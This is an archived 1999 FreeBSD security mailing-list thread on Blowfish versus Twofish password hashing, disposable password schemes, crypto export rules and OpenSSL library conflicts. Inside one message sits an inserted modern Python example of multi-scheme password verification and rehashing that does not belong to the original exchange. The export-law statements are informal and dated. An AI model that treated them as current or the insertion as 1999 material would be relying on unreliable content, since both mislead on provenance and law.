Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id 1CF03152D2 for ; Sun, 2 May 1999 02:37:49 -0700 (PDT) (envelope-from jeroen@vangelderen.org)
Received: from ut243008.inbel.utwente.nl ([130.89.243.8]:2061 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <7971-20149>; Sun, 2 May 1999 11:37:31 +0200
Message-ID: <372C1CD9.43BE5852@vangelderen.org>
Date: Sun, 02 May 1999 11:37:29 +0200
From: "Jeroen C.
van Gelderen" X-Mailer: Mozilla 4.51 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Poul-Henning Kamp Cc: Robert Watson , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish References: <2570.925637444@critter.freebsd.dk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Poul-Henning Kamp wrote: > > In message <372C19F5.625BB2B@vangelderen.org>, "Jeroen C. van Gelderen" writes: > >Robert Watson wrote: > >[...] > >> I'd recommend against using Blowfish--go for Twofish. > > > >Regardless of what you think about Blowfish, recommending Twofish > >is a very, very bad move. > > Considering that the concept for passwords is a "kleenex-model", > it doesn't matter. We can change the algorithm at the first hint > of trouble and ask people to change passwords and we're in safe > water. That's not the point. In crypto you need to be as conservative as possible. Recommending a newly invented algorithm before it has seen intensive analysis is not a good idea. It doesn't matter what the application is. Cheers, Jeroen -- Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 2:51:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id D5C1B14C40 for ; Sun, 2 May 1999 02:51:19 -0700 (PDT) (envelope-from jeroen@vangelderen.org) Received: from ut243008.inbel.utwente.nl ([130.89.243.8]:2573 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <7971-20163>; Sun, 2 May 1999 11:51:00 +0200 Message-ID: <372C2001.BEA307F6@vangelderen.org> Date: Sun, 02 May 1999 11:50:57 +0200 From: "Jeroen C. 
van Gelderen" X-Mailer: Mozilla 4.51 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: "Harry M. Leitzell" Cc: Robert Watson , Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Harry M. Leitzell" wrote: > 1) If Robert were to write code on a machine that > is in a foreign country, would it have been considered > exported? (Xterm on a cs.hut.fi machine for example > to code in) Even if he is in the US while doing so? Yes. > 2) Can we still do the moving by paper to another > country and scanning it in? Is that legitimate or > been deemed illegal? Yes and no. Yes, if you publish it, it is covered by the first amendment and you can freely export the book. But you will have to *publish* the crypto; just printing it in a letter is not good enough. Fortunately, getting your 'work' published is not that hard; there are companies that specialize in low volume printing... > 3) If I write a disk encryptor that sits on the MBR > and transfer the disk out of country, is that a no-no? Maybe. It was for quite a while but right now there are some exceptions. You can get a license and promise that you won't give the stuff to foreigners and you are allowed to take the software with you. Check out the M$ or Netscape websites, I think it's covered there for their 128-bit browsers. Note: I'm not a lawyer and not a US citizen. Get legal advice before you do something. Mail me in private if you need addresses and such. Cheers, Jeroen -- Jeroen C. 
van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 3: 8:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 9330F14C40 for ; Sun, 2 May 1999 03:08:11 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id MAA22117; Sun, 2 May 1999 12:08:09 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id MAA02687; Sun, 2 May 1999 12:08:08 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: "Jordan K. Hubbard" Cc: "Jeroen C. van Gelderen" , Robert Watson , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-reply-to: Your message of "Sun, 02 May 1999 02:33:27 PDT." <23355.925637607@zippy.cdrom.com> Date: Sun, 02 May 1999 12:08:07 +0200 Message-ID: <2685.925639687@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <23355.925637607@zippy.cdrom.com>, "Jordan K. Hubbard" writes: >> Considering that the concept for passwords is a "kleenex-model", > >OK, I'll bite, what the hell is a "kleenex-model" ? :-) The things we encrypt are transient, we don't need to keep them around for later decryption and they can be replaced with no problems. If we find a problem with MD5 as we use it today, we simply plug in something stronger and tell users to change their passwords (or ELSE!) and we're in no danger anymore. 
If we had real encrypted data we would need to retrieve it, decrypt it recrypt it, store it *and make sure the copy made with the old encryption is GONE* This is a PITA if you have it stored in an optical jukebox for instance. I was the one who coined the term "kleenex-model" for it, but it may not be a very apt term... -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 3:13:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from zeus.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id 8812C15149 for ; Sun, 2 May 1999 03:13:40 -0700 (PDT) (envelope-from akm@zeus.theinternet.com.au) Received: (from akm@localhost) by zeus.theinternet.com.au (8.9.3/8.8.7) id UAA65271; Sun, 2 May 1999 20:09:17 +1000 (EST) (envelope-from akm) From: Andrew Kenneth Milton Message-Id: <199905021009.UAA65271@zeus.theinternet.com.au> Subject: Re: Blowfish/Twofish In-Reply-To: <23355.925637607@zippy.cdrom.com> from "Jordan K. Hubbard" at "May 2, 1999 2:33:27 am" To: jkh@zippy.cdrom.com (Jordan K. Hubbard) Date: Sun, 2 May 1999 20:09:17 +1000 (EST) Cc: phk@critter.freebsd.dk, jeroen@vangelderen.org, robert+freebsd@cyrus.watson.org, geniusj@phoenix.unacom.com, brian@capital-data.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ Jordan K. Hubbard ]--------------------------------------------- | > Considering that the concept for passwords is a "kleenex-model", | | OK, I'll bite, what the hell is a "kleenex-model" ? :-) Disposable -- personified. 
:-) -- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 5:12:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id 84CEA15440 for ; Sun, 2 May 1999 05:12:13 -0700 (PDT) (envelope-from mark@grondar.za) Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.3/8.9.3) with ESMTP id OAA35957; Sun, 2 May 1999 14:12:04 +0200 (SAST) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id OAA01249; Sun, 2 May 1999 14:11:57 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199905021211.OAA01249@greenpeace.grondar.za> To: "Jordan K. Hubbard" Cc: "Jeroen C. van Gelderen" , Robert Watson , Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: Your message of " Sun, 02 May 1999 02:32:55 MST." <23332.925637575@zippy.cdrom.com> References: <23332.925637575@zippy.cdrom.com> Date: Sun, 02 May 1999 14:11:56 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Jordan K. Hubbard" wrote: > Erm, one of the goals of PAM is to support *multiple* encryption > methods, so why not do a PAM module for each and let the administrator > decide which authentication methods to support in /etc/pam.conf? Hear, hear! 
M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 5:49:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id F09B215222 for ; Sun, 2 May 1999 05:49:11 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id OAA15326; Sun, 2 May 1999 14:49:07 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id OAA24508; Sun, 2 May 1999 14:49:06 +0200 (MET DST) Date: Sun, 2 May 1999 14:49:06 +0200 From: Eivind Eklund To: Robert Watson Cc: Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990502144906.E23950@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: ; from Robert Watson on Sat, May 01, 1999 at 03:07:30PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 01, 1999 at 03:07:30PM -0400, Robert Watson wrote: > So I'd gladly write this code, as well as do a number of other > crypto-related things, but I'm inside the US. Someone outside the US will > have to take this initiative, I'm afraid. For this application, being inside the US is probably not a problem. The way I would implement this is to use OpenSSL (formerly SSLeay) through their library interface, dlopen() the library, and only support Blowfish passwords if the library is available. As what you'll be writing is authentication infrastructure, not encryption infrastructure, exporting it is not a problem. I do not know of any country that forbids export of authentication infrastructure. 
Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 7:58:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id 68F3B151B4; Sun, 2 May 1999 07:58:38 -0700 (PDT) (envelope-from mark@grondar.za) Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.3/8.9.3) with ESMTP id QAA36303; Sun, 2 May 1999 16:58:36 +0200 (SAST) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id QAA02696; Sun, 2 May 1999 16:58:30 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199905021458.QAA02696@greenpeace.grondar.za> To: Eivind Eklund Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: Your message of " Sun, 02 May 1999 14:49:06 +0200." <19990502144906.E23950@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> Date: Sun, 02 May 1999 16:58:29 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Eivind Eklund wrote: > On Sat, May 01, 1999 at 03:07:30PM -0400, Robert Watson wrote: > > So I'd gladly write this code, as well as do a number of other > > crypto-related things, but I'm inside the US. Someone outside the US will > > have to take this initiative, I'm afraid. > > For this application, being inside the US is probably not a problem. > The way I would implement this is to use OpenSSL (formerly SSLeay) > through their library interface, dlopen() the library, and only > support Blowfish passwords if the library is available. As what > you'll be writing is authentication infrastructure, not encryption > infrastructure, exporting it is not a problem. 
I do not know of any > country that forbid export of authentication infrastructure. _Way_ overkill. A far simpler structure can easily be built by hand. M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 8: 9:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 77080151B4 for ; Sun, 2 May 1999 08:09:36 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id RAA16760; Sun, 2 May 1999 17:09:35 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id RAA33176; Sun, 2 May 1999 17:09:29 +0200 (MET DST) Date: Sun, 2 May 1999 17:09:29 +0200 From: Eivind Eklund To: Mark Murray Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990502170929.B32819@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <199905021458.QAA02696@greenpeace.grondar.za>; from Mark Murray on Sun, May 02, 1999 at 04:58:29PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 02, 1999 at 04:58:29PM +0200, Mark Murray wrote: > Eivind Eklund wrote: > > On Sat, May 01, 1999 at 03:07:30PM -0400, Robert Watson wrote: > > > So I'd gladly write this code, as well as do a number of other > > > crypto-related things, but I'm inside the US. Someone outside the US will > > > have to take this initiative, I'm afraid. > > > > For this application, being inside the US is probably not a problem. 
> > The way I would implement this is to use OpenSSL (formerly SSLeay) > > through their library interface, dlopen() the library, and only > > support Blowfish passwords if the library is available. As what > > you'll be writing is authentication infrastructure, not encryption > > infrastructure, exporting it is not a problem. I do not know of any > > country that forbid export of authentication infrastructure. > > _Way_ overkill. A far simpler structure can easily be built by hand. I do not understand what you mean - elaborate? Dynamically linking in a new library if it is present is not very difficult - do you mean that OpenSSL has too complicated an API? Or what is it you're trying to say? Eivind, confused. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 8:42: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id 5F0E915225; Sun, 2 May 1999 08:41:51 -0700 (PDT) (envelope-from mark@grondar.za) Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.3/8.9.3) with ESMTP id RAA36381; Sun, 2 May 1999 17:41:50 +0200 (SAST) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id RAA02885; Sun, 2 May 1999 17:41:48 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199905021541.RAA02885@greenpeace.grondar.za> To: Eivind Eklund Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: Your message of " Sun, 02 May 1999 17:09:29 +0200." 
<19990502170929.B32819@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> Date: Sun, 02 May 1999 17:41:47 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Eivind Eklund wrote: > > _Way_ overkill. A far simpler structure can easily be built by hand. > > I do not understand what you mean - elaborate? Dynamically linking in > a new library if it is present is not very difficult - do you mean > that OpenSSL has too complicated an API? Or what is it you're trying > to say? Yes. libcrypto from OpenSSL is huge, and is hefty overkill for a password hashing system. Apart from that, it has a name conflict with kerberos (which also has a libcrypto). A password hashing system just needs a couple (few?) good hashes; nothing else. M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 9:16:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 366BB1542D for ; Sun, 2 May 1999 09:16:50 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id SAA17563; Sun, 2 May 1999 18:16:49 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id SAA33436; Sun, 2 May 1999 18:16:47 +0200 (MET DST) Date: Sun, 2 May 1999 18:16:47 +0200 From: Eivind Eklund To: Mark Murray Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990502181647.C32819@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> 
<199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> <199905021541.RAA02885@greenpeace.grondar.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <199905021541.RAA02885@greenpeace.grondar.za>; from Mark Murray on Sun, May 02, 1999 at 05:41:47PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 02, 1999 at 05:41:47PM +0200, Mark Murray wrote: > Eivind Eklund wrote: > > > _Way_ overkill. A far simpler structure can easily be built by hand. > > > > I do not understand what you mean - elaborate? Dynamically linking in > > a new library if it is present is not very difficult - do you mean > > that OpenSSL has too complicated an API? Or what is it you're trying > > to say? > > Yes. libcrypto from OpenSSL is huge, and is hefty overkill for a > password hashing system. Apart from that, it has a name conflict > with kerberos (which also has a libcrypto). > > A password hashing system just needs a couple (few?) good hashes; > nothing else. The point of this exercise would (IMO, at least) only be OpenBSD compatibility, where OpenBSD for marketeering reasons has decided to use Blowfish as part of their hash algorithm. If people can't migrate their password files, they are much less likely to migrate to FreeBSD, which means we should support their password formats if feasible. As for the libcrypto naming conflict - is the Kerberos libcrypto used by things outside Kerberos, or is it feasible to rename it? When I get around to integrating the signature support into pkg_* (I have code that works in a test environment, but haven't had time to integrate it), we'll need libcrypto from OpenSSL in order to support signatures - and renaming it in the port would IMO be fairly evil. Eivind. 
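The "kleenex model" Poul-Henning Kamp describes earlier in this thread (swap the hash algorithm at the first hint of trouble and have users change passwords) and Eivind Eklund's point above that a migrated password file may carry hashes in another system's format both rest on one mechanism: the stored string names the scheme it was produced with, so the verifier can dispatch on that tag, accept several formats side by side, and replace an entry the next time the user presents the plaintext. The following is an added example written for this archive, not code from FreeBSD, OpenBSD or anyone in the thread. The scheme tags, the salted-MD5 stand-in for a legacy scheme, the choice of PBKDF2-SHA256 as the current scheme, the round count and the sample accounts are all assumptions; OpenBSD's Blowfish-based format is not implemented because the Python standard library lacks bcrypt, and it would plug into the same dispatch in verify().

```python
import base64
import hashlib
import hmac
import os

# Scheme tags stored in the hash string, modelled on the "$id$..." prefix
# convention of crypt(3)-style hashes. "1" is a stand-in for a weak legacy
# scheme (assumed here: salted MD5, not md5crypt itself); "pbkdf2" is the
# scheme new hashes get. Both tags are assumptions for this example.
LEGACY_SCHEME = "1"
CURRENT_SCHEME = "pbkdf2"
DEFAULT_ROUNDS = 100_000


def _b64(raw):
    return base64.b64encode(raw).decode("ascii")


def _unb64(text):
    return base64.b64decode(text)


def hash_password(password, scheme=CURRENT_SCHEME, salt=None, rounds=DEFAULT_ROUNDS):
    """Return a self-describing hash: $scheme$[rounds$]salt$digest (base64 fields)."""
    salt = os.urandom(16) if salt is None else salt
    pw = password.encode("utf-8")
    if scheme == LEGACY_SCHEME:
        digest = hashlib.md5(salt + pw).digest()
        return f"${LEGACY_SCHEME}${_b64(salt)}${_b64(digest)}"
    if scheme == CURRENT_SCHEME:
        digest = hashlib.pbkdf2_hmac("sha256", pw, salt, rounds)
        return f"${CURRENT_SCHEME}${rounds}${_b64(salt)}${_b64(digest)}"
    raise ValueError(f"unknown scheme {scheme!r}")


def verify(password, stored):
    """Dispatch on the stored tag; malformed entries and unknown tags never verify."""
    fields = stored.split("$")
    if len(fields) < 4 or fields[0] != "":
        return False
    scheme = fields[1]
    try:
        if scheme == LEGACY_SCHEME:
            _, _, salt, _ = fields
            candidate = hash_password(password, scheme, _unb64(salt))
        elif scheme == CURRENT_SCHEME:
            _, _, rounds, salt, _ = fields
            candidate = hash_password(password, scheme, _unb64(salt), int(rounds))
        else:
            return False          # a tag this verifier has no module for
    except (ValueError, TypeError):
        return False              # wrong field count, bad base64, bad rounds
    # Constant-time comparison of the recomputed string with the stored one.
    return hmac.compare_digest(candidate.encode("ascii"), stored.encode("ascii"))


def needs_rehash(stored):
    """True when the entry is on anything but the current scheme and parameters."""
    fields = stored.split("$")
    if len(fields) < 3 or fields[1] != CURRENT_SCHEME:
        return True
    return int(fields[2]) < DEFAULT_ROUNDS


def login(store, user, password):
    """Authenticate; on success move a stale entry to the current scheme.

    The plaintext is only in hand at login, so this is the one moment an
    old hash can be replaced without asking the user to pick a new password.
    """
    stored = store.get(user)
    if stored is None or not verify(password, stored):
        return "denied"
    if needs_rehash(stored):
        store[user] = hash_password(password)
        return "ok-rehashed"
    return "ok"


def still_on_scheme(store, scheme):
    """Users whose entry still carries the given tag: after a change-by
    deadline these are the accounts to lock or force through a reset."""
    return sorted(u for u, h in store.items()
                  if len(h.split("$")) > 1 and h.split("$")[1] == scheme)


if __name__ == "__main__":
    # Constructed sample store: two accounts on the legacy scheme, one current.
    users = {
        "alice": hash_password("correct horse", LEGACY_SCHEME),
        "bob": hash_password("hunter2", LEGACY_SCHEME),
        "carol": hash_password("battery staple"),
    }
    print(login(users, "alice", "correct horse"))   # ok-rehashed
    print(login(users, "alice", "correct horse"))   # ok
    print(login(users, "bob", "wrong"))             # denied
    print(still_on_scheme(users, LEGACY_SCHEME))    # ['bob']
```

The tag is what makes the algorithm disposable: nothing outside verify() needs to know which scheme produced an entry, a hash in a format without a module simply fails closed, and still_on_scheme() gives the list of users who never logged in after the switch and therefore must be told to change their password before the old scheme is removed.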
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 9:21:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp11.bellglobal.com (smtp11.bellglobal.com [204.101.251.53]) by hub.freebsd.org (Postfix) with ESMTP id 4F25E154B4; Sun, 2 May 1999 09:21:44 -0700 (PDT) (envelope-from bryanf@geisha.apt.samurai.com) Received: from geisha.apt.samurai.com (HSE-TOR-ppp37129.sympatico.ca [209.226.141.196]) by smtp11.bellglobal.com (8.8.5/8.8.5) with ESMTP id MAA13643; Sun, 2 May 1999 12:24:15 -0400 (EDT) Received: (from bryanf@localhost) by geisha.apt.samurai.com (8.9.1a/8.9.1) id MAA00338; Sun, 2 May 1999 12:21:43 -0400 (EDT) Date: Sun, 2 May 1999 12:21:43 -0400 From: Bryan Fullerton To: Eivind Eklund Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990502122142.A289@samurai.com> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> <199905021541.RAA02885@greenpeace.grondar.za> <19990502181647.C32819@bitbox.follo.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.96.1i In-Reply-To: <19990502181647.C32819@bitbox.follo.net>; from Eivind Eklund on Sun, May 02, 1999 at 06:16:47PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 02, 1999 at 06:16:47PM +0200, Eivind Eklund wrote: > > The point of this exercise would (IMO, at least) only be OpenBSD > compatibility, where OpenBSD for marketeering reasons has decided to > use Blowfish as part of their hash algorithm. If people can't migrate > their password files, they are much less likely to migrate to FreeBSD, > which means we should support their password formats if feasible. Are there many people migrating from OpenBSD to FreeBSD? 
Bryan -- Bryan Fullerton http://www.samurai.com/ Owner, Lead Consultant http://www.feh.net/ Samurai Consulting http://www.icomm.ca/ "No, we don't do seppuku." Can you feel the Ohmu call? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 9:27:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id 5310C14F80; Sun, 2 May 1999 09:27:31 -0700 (PDT) (envelope-from mark@grondar.za) Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.3/8.9.3) with ESMTP id SAA36494; Sun, 2 May 1999 18:27:29 +0200 (SAST) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id SAA03150; Sun, 2 May 1999 18:27:29 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199905021627.SAA03150@greenpeace.grondar.za> To: Eivind Eklund Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: Your message of " Sun, 02 May 1999 18:16:47 +0200." <19990502181647.C32819@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> <199905021541.RAA02885@greenpeace.grondar.za> <19990502181647.C32819@bitbox.follo.net> Date: Sun, 02 May 1999 18:27:29 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Eivind Eklund wrote: > > Yes. libcrypto from OpenSSL is huge, and is hefty overkill for a > > password hashing system. Apart from that, it has a name conflict > > with kerberos (which also has a libcrypto). > > > > A password hashing system just needs a couple (few?) good hashes; > > nothing else. 
> > The point of this exercise would (IMO, at least) only be OpenBSD > compatibility, where OpenBSD for marketeering reasons has decided to > use Blowfish as part of their hash algorithm. If people can't migrate > their password files, they are much less likely to migrate to FreeBSD, > which means we should support their password formats if feasible. No problem. It can be added as a one-file addition to the current system. > As for the libcrypto naming conflict - is the Kerberos libcrypto used > by things outside Kerberos, or is it feasible to rename it? When I > get around to integrating the signature support into pkg_* (I have > code that work in a test environment, but haven't had time to > integrate it), we'll need libcrypto from OpenSSL in order to support > signatures - and renaming it in the port would IMO be fairly evil. Ditto for Kerberos, and Kerberos got there first :-) How do your signatures work? Can you not just use the MD? and SHA algorithms out of libmd? If not, can we not extend libmd? 
M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 9:28:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 1142015107; Sun, 2 May 1999 09:28:55 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id SAA17692; Sun, 2 May 1999 18:28:54 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id SAA33527; Sun, 2 May 1999 18:28:53 +0200 (MET DST) Date: Sun, 2 May 1999 18:28:53 +0200 From: Eivind Eklund To: Bryan Fullerton Cc: freebsd-chat@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990502182853.D32819@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> <199905021541.RAA02885@greenpeace.grondar.za> <19990502181647.C32819@bitbox.follo.net> <19990502122142.A289@samurai.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <19990502122142.A289@samurai.com>; from Bryan Fullerton on Sun, May 02, 1999 at 12:21:43PM 